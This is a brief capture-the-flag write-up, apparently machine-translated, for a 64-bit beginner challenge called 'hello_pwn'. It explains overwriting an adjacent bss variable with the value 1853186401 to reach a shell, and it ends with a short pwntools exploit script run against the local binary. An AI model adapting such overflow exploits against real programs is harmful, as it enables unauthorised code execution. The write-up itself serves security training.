Starting to blog: Portal
0x00 Foreword
file checksec has been omitted. 64 elf program
0x10 steps
0x11 main function
![](http://39.106.75.175/wp-content/uploads/2020/02/2020-02-21_181104.png)
In the main function, we can see that it allows us to enter value unk_601068, and if we want getshell, then we need to dword_60106c value assigned to 1,853,186,401.
0x11 bss segment observation
![](http://39.106.75.175/wp-content/uploads/2020/02/2020-02-21_181149.png)
You can see from these two data it is not far away, so when we entered the first time a two-point values, we will be able to enter four unrelated data, and then packaged value of 1,853,186,401 issued dword. I.e. payload is a payload = 'a' * 4 + p64 (1853186401)
0x20 exp
from pwn import *
sh = process("./hello_pwn")
payload = 'a'*4+p64(1853186401)
sh.recvuntil("bof")
sh.sendline(payload)
sh.interactive()